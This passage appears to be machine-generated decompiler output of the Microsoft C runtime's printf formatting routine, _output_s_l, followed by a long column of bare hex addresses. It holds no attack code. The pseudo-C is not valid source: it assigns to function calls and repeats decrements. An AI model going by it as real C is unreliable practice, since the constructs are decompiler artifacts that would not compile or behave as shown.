    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x2b4) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x2b4) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x2b4) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L170;
    																			}
    																		case 0xa:
    																			goto L0;
    																		case 0xb:
    																			L90:
    																			__eflags =  *(__ebp - 0x30) - 0xffffffff;
    																			if( *(__ebp - 0x30) != 0xffffffff) {
    																				__edx =  *(__ebp - 0x30);
    																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
    																			} else {
    																				 *(__ebp - 0x328) = 0x7fffffff;
    																			}
    																			__eax =  *(__ebp - 0x328);
    																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																			__eflags =  *(__ebp - 0x10) & 0x00000810;
    																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																				L101:
    																				__eflags =  *(__ebp - 4);
    																				if( *(__ebp - 4) == 0) {
    																					__edx =  *0xd121a0; // 0xb775a0
    																					 *(__ebp - 4) = __edx;
    																				}
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x28c) =  *(__ebp - 4);
    																				while(1) {
    																					L104:
    																					__ecx =  *(__ebp - 0x290);
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					__eflags = __ecx;
    																					if(__ecx == 0) {
    																						break;
    																					}
    																					L105:
    																					__eax =  *(__ebp - 0x28c);
    																					__ecx =  *( *(__ebp - 0x28c));
    																					__eflags = __ecx;
    																					if(__ecx == 0) {
    																						break;
    																					}
    																					L106:
    																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																				}
    																				L107:
    																				__eax =  *(__ebp - 0x28c);
    																				__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
    																				__eflags = __eax;
    																				 *(__ebp - 0x24) = __eax;
    																				goto L108;
    																			} else {
    																				L94:
    																				__eflags =  *(__ebp - 4);
    																				if( *(__ebp - 4) == 0) {
    																					__eax =  *0xd121a4; // 0xb77590
    																					 *(__ebp - 4) = __eax;
    																				}
    																				 *(__ebp - 0xc) = 1;
    																				__ecx =  *(__ebp - 4);
    																				 *(__ebp - 0x294) =  *(__ebp - 4);
    																				while(1) {
    																					L97:
    																					__edx =  *(__ebp - 0x290);
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					__eflags =  *(__ebp - 0x290);
    																					if( *(__ebp - 0x290) == 0) {
    																						break;
    																					}
    																					L98:
    																					__ecx =  *(__ebp - 0x294);
    																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																					__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																						break;
    																					}
    																					L99:
    																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																				}
    																				L100:
    																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    																				 *(__ebp - 0x24) = __ecx;
    																				L108:
    																				while(1) {
    																					L190:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L216;
    																					}
    																					goto L191;
    																				}
    																			}
    																		case 0xc:
    																			L145:
    																			 *(__ebp - 8) = 0xa;
    																			while(1) {
    																				L153:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																				__eflags =  *(__ebp - 0x10) & 0x00008000;
    																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																					__eflags =  *(__ebp - 0x10) & 0x00001000;
    																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																						__eflags =  *(__ebp - 0x10) & 0x00000020;
    																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__edx = 0;
    																								__eflags = 0;
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = 0;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = __edx;
    																							}
    																						} else {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																								 *(__ebp - 0x2b4) = __edx;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__ax = __eax;
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = __edx;
    																							}
    																						}
    																					} else {
    																						__eax = __ebp + 0x14;
    																						 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																						 *(__ebp - 0x2b4) = __edx;
    																					}
    																				} else {
    																					__ecx = __ebp + 0x14;
    																					 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x2b4) = __edx;
    																				}
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																				__eflags =  *(__ebp - 0x10) & 0x00000040;
    																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																					goto L170;
    																				}
    																				goto L166;
    																			}
    																		case 0xd:
    																			L147:
    																			 *(__ebp - 0x260) = 0x27;
    																			L148:
    																			 *(__ebp - 8) = 0x10;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			__eflags =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				 *(__ebp - 0x14) = 0x30;
    																				 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    																				__eflags =  *(__ebp - 0x260) + 0x51;
    																				 *((char*)(__ebp - 0x13)) = __al;
    																				 *(__ebp - 0x1c) = 2;
    																			}
    																			while(1) {
    																				L153:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																				__eflags =  *(__ebp - 0x10) & 0x00008000;
    																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																					__eflags =  *(__ebp - 0x10) & 0x00001000;
    																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																						__eflags =  *(__ebp - 0x10) & 0x00000020;
    																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__edx = 0;
    																								__eflags = 0;
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = 0;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = __edx;
    																							}
    																						} else {
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																							__eflags =  *(__ebp - 0x10) & 0x00000040;
    																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																								__ecx = __ebp + 0x14;
    																								E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																								 *(__ebp - 0x2b4) = __edx;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								__eax = E00B93D50(__ebp + 0x14);
    																								__ax = __eax;
    																								asm("cdq");
    																								 *(__ebp - 0x2b8) = __eax;
    																								 *(__ebp - 0x2b4) = __edx;
    																							}
    																						}
    																					} else {
    																						__eax = __ebp + 0x14;
    																						 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																						 *(__ebp - 0x2b4) = __edx;
    																					}
    																				} else {
    																					__ecx = __ebp + 0x14;
    																					 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x2b4) = __edx;
    																				}
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																				__eflags =  *(__ebp - 0x10) & 0x00000040;
    																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																					goto L170;
    																				}
    																				goto L166;
    																			}
    																		case 0xe:
    																			while(1) {
    																				L190:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			}
    																	}
    																case 8:
    																	L30:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																	goto L33;
    																case 9:
    																	L31:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																	goto L33;
    																case 0xa:
    																	L29:
    																	__ecx =  *(__ebp - 0x10);
    																	__ecx =  *(__ebp - 0x10) | 0x00000001;
    																	 *(__ebp - 0x10) = __ecx;
    																	goto L33;
    																case 0xb:
    																	L28:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																	goto L33;
    																case 0xc:
    																	L32:
    																	__ecx =  *(__ebp - 0x10);
    																	__ecx =  *(__ebp - 0x10) | 0x00000008;
    																	__eflags = __ecx;
    																	 *(__ebp - 0x10) = __ecx;
    																	goto L33;
    																case 0xd:
    																	L33:
    																	goto L218;
    															}
    														} else {
    															if(0 == 0) {
    																 *(_t557 - 0x314) = 0;
    															} else {
    																 *(_t557 - 0x314) = 1;
    															}
    															_t543 =  *(_t557 - 0x314);
    															 *(_t557 - 0x278) =  *(_t557 - 0x314);
    															if( *(_t557 - 0x278) == 0) {
    																_push( &M00B77C38);
    																_push(0);
    																_push(0x460);
    																_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																_push(2);
    																_t526 = L00B7D760();
    																_t559 = _t559 + 0x14;
    																if(_t526 == 1) {
    																	asm("int3");
    																}
    															}
    															L14:
    															if( *(_t557 - 0x278) != 0) {
    																goto L16;
    															} else {
    																 *((intOrPtr*)(L00B80C60(_t543))) = 0x16;
    																E00B809F0(_t528, _t543, _t555, _t556,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    																 *(_t557 - 0x2f0) = 0xffffffff;
    																E00B7C650(_t557 - 0x40);
    																_t499 =  *(_t557 - 0x2f0);
    																L229:
    																return E00B805D0(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
    															}
    														}
    													}
    													L219:
    													__eflags =  *(_t557 - 0x25c);
    													if( *(_t557 - 0x25c) == 0) {
    														L222:
    														 *(_t557 - 0x334) = 1;
    														L223:
    														_t530 =  *(_t557 - 0x334);
    														 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
    														__eflags =  *(_t557 - 0x2e0);
    														if( *(_t557 - 0x2e0) == 0) {
    															_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    															_push(0);
    															_push(0x8f5);
    															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    															_push(2);
    															_t504 = L00B7D760();
    															_t559 = _t559 + 0x14;
    															__eflags = _t504 - 1;
    															if(_t504 == 1) {
    																asm("int3");
    															}
    														}
    														__eflags =  *(_t557 - 0x2e0);
    														if( *(_t557 - 0x2e0) != 0) {
    															 *(_t557 - 0x300) =  *(_t557 - 0x24c);
    															E00B7C650(_t557 - 0x40);
    															_t499 =  *(_t557 - 0x300);
    														} else {
    															 *((intOrPtr*)(L00B80C60(_t530))) = 0x16;
    															E00B809F0(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    															 *(_t557 - 0x2fc) = 0xffffffff;
    															E00B7C650(_t557 - 0x40);
    															_t499 =  *(_t557 - 0x2fc);
    														}
    														goto L229;
    													}
    													L220:
    													__eflags =  *(_t557 - 0x25c) - 7;
    													if( *(_t557 - 0x25c) == 7) {
    														goto L222;
    													}
    													L221:
    													 *(_t557 - 0x334) = 0;
    													goto L223;
    												}
    											}
    											L187:
    											__eflags =  *(__ebp - 0x24);
    											if( *(__ebp - 0x24) == 0) {
    												L189:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												goto L190;
    											}
    											L188:
    											__eax =  *(__ebp - 4);
    											__ecx =  *( *(__ebp - 4));
    											__eflags = __ecx - 0x30;
    											if(__ecx == 0x30) {
    												goto L190;
    											}
    											goto L189;
    										}
    										L183:
    										__eax =  *(__ebp - 8);
    										asm("cdq");
    										__ecx =  *(__ebp - 0x2bc);
    										__edx =  *(__ebp - 0x2c0);
    										__eax = E00B855B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
    										 *(__ebp - 0x2ac) = __eax;
    										__eax =  *(__ebp - 8);
    										asm("cdq");
    										__eax =  *(__ebp - 0x2bc);
    										__ecx =  *(__ebp - 0x2c0);
    										 *(__ebp - 0x2c0) = E00B85630( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
    										 *(__ebp - 0x2bc) = __edx;
    										__eflags =  *(__ebp - 0x2ac) - 0x39;
    										if( *(__ebp - 0x2ac) > 0x39) {
    											__edx =  *(__ebp - 0x2ac);
    											__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
    											__eflags = __edx;
    											 *(__ebp - 0x2ac) = __edx;
    										}
    										__eax =  *(__ebp - 4);
    										__cl =  *(__ebp - 0x2ac);
    										 *( *(__ebp - 4)) = __cl;
    										 *(__ebp - 4) =  *(__ebp - 4) - 1;
    										 *(__ebp - 4) =  *(__ebp - 4) - 1;
    										L181:
    										__ecx =  *(__ebp - 0x30);
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										__eflags =  *(__ebp - 0x30);
    										if( *(__ebp - 0x30) > 0) {
    											goto L183;
    										}
    										goto L182;
    									}
    								}
    								L168:
    								__eflags =  *(__ebp - 0x2b8);
    								if( *(__ebp - 0x2b8) >= 0) {
    									goto L170;
    								}
    								goto L169;
    								L170:
    								__ecx =  *(__ebp - 0x2b8);
    								 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
    								__edx =  *(__ebp - 0x2b4);
    								 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
    								goto L171;
    							}
    						}
    					}
    				}
    			}













    0x00b95704
    0x00b95704
    0x00b95704
    0x00b95704
    0x00b9570b
    0x00b9570b
    0x00b9570b
    0x00b95721
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00000000
    0x00b95851
    0x00b95851
    0x00b9585c
    0x00b95862
    0x00b95864
    0x00b9586a
    0x00b9586d
    0x00b9586f
    0x00b95875
    0x00b9587e
    0x00b95883
    0x00b958a0
    0x00b958a3
    0x00b958a3
    0x00b958a8
    0x00b958ad
    0x00b958ad
    0x00b958b3
    0x00b958b5
    0x00b958bb
    0x00b958c1
    0x00b958c1
    0x00b958ca
    0x00b958ca
    0x00b958b3
    0x00b958d0
    0x00b958d4
    0x00b958e2
    0x00b958e5
    0x00b958e8
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b958fe
    0x00b958fe
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b9590d
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00b95923
    0x00b95929
    0x00b95929
    0x00b9592f
    0x00b959ac
    0x00b959af
    0x00b959b2
    0x00b959b5
    0x00b959b8
    0x00b959bb
    0x00b959c1
    0x00b959c1
    0x00b959c7
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00b959fc
    0x00b959ff
    0x00b959ff
    0x00b95a02
    0x00b95a07
    0x00b95a07
    0x00b95a0c
    0x00b95a1e
    0x00b95a1e
    0x00b95a21
    0x00b95a33
    0x00b95a33
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a46
    0x00b95a49
    0x00b95a4c
    0x00b95a55
    0x00b95a55
    0x00b95a58
    0x00b95a5a
    0x00b95a61
    0x00b95a65
    0x00b95a6e
    0x00b95a73
    0x00b95a76
    0x00b95a7d
    0x00b95a81
    0x00b95a85
    0x00b95a91
    0x00b95a94
    0x00b95a94
    0x00b95a97
    0x00b95a9c
    0x00b95a9c
    0x00b95a9f
    0x00b95aa1
    0x00b95aa8
    0x00b95aac
    0x00b95ab5
    0x00b95aba
    0x00b95a9f
    0x00b95abd
    0x00b95ac1
    0x00b95b95
    0x00b95b95
    0x00b95b9c
    0x00b95ba0
    0x00b95ba4
    0x00b95ba8
    0x00000000
    0x00b95ac7
    0x00b95ac7
    0x00b95ac7
    0x00b95acb
    0x00000000
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95adb
    0x00b95ade
    0x00b95ae4
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95aed
    0x00b95af9
    0x00b95afc
    0x00b95b02
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b0a
    0x00b95b13
    0x00b95b1a
    0x00b95b24
    0x00b95b2b
    0x00b95b3a
    0x00b95b46
    0x00b95b49
    0x00b95b4f
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b61
    0x00b95b58
    0x00b95b58
    0x00b95b5f
    0x00b95b6d
    0x00b95b6d
    0x00b95b74
    0x00b95b78
    0x00b95b86
    0x00000000
    0x00b95b8b
    0x00000000
    0x00b95b5f
    0x00b95b93
    0x00b95bb0
    0x00b95bb0
    0x00b95bb7
    0x00b95bbc
    0x00b95bbc
    0x00b95bbf
    0x00b95bc1
    0x00b95bc8
    0x00b95bcc
    0x00b95bd5
    0x00b95bda
    0x00b95bbf
    0x00b95bb7
    0x00b95bdd
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e19
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e53
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94eba
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f7e
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fde
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff2
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b95037
    0x00b9503a
    0x00b9505a
    0x00b9505d
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504b
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b9508f
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e5
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95116
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95144
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b9514f
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515a
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95165
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95170
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517b
    0x00b9517e
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95122
    0x00b95125
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b95125
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f1
    0x00b950f4
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00b95108
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b6
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b9519e
    0x00b951a1
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951d1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b951d7
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951ee
    0x00b951f4
    0x00b951f6
    0x00b951f9
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b9532e
    0x00b95333
    0x00b95335
    0x00b95338
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00000000
    0x00000000
    0x00b95295
    0x00b95295
    0x00b952a1
    0x00b952a7
    0x00b952ae
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c5
    0x00b952d1
    0x00b95326
    0x00000000
    0x00b95326
    0x00b952b0
    0x00b952b0
    0x00b952b6
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00000000
    0x00b952df
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b9556e
    0x00b95572
    0x00b9557d
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d2
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
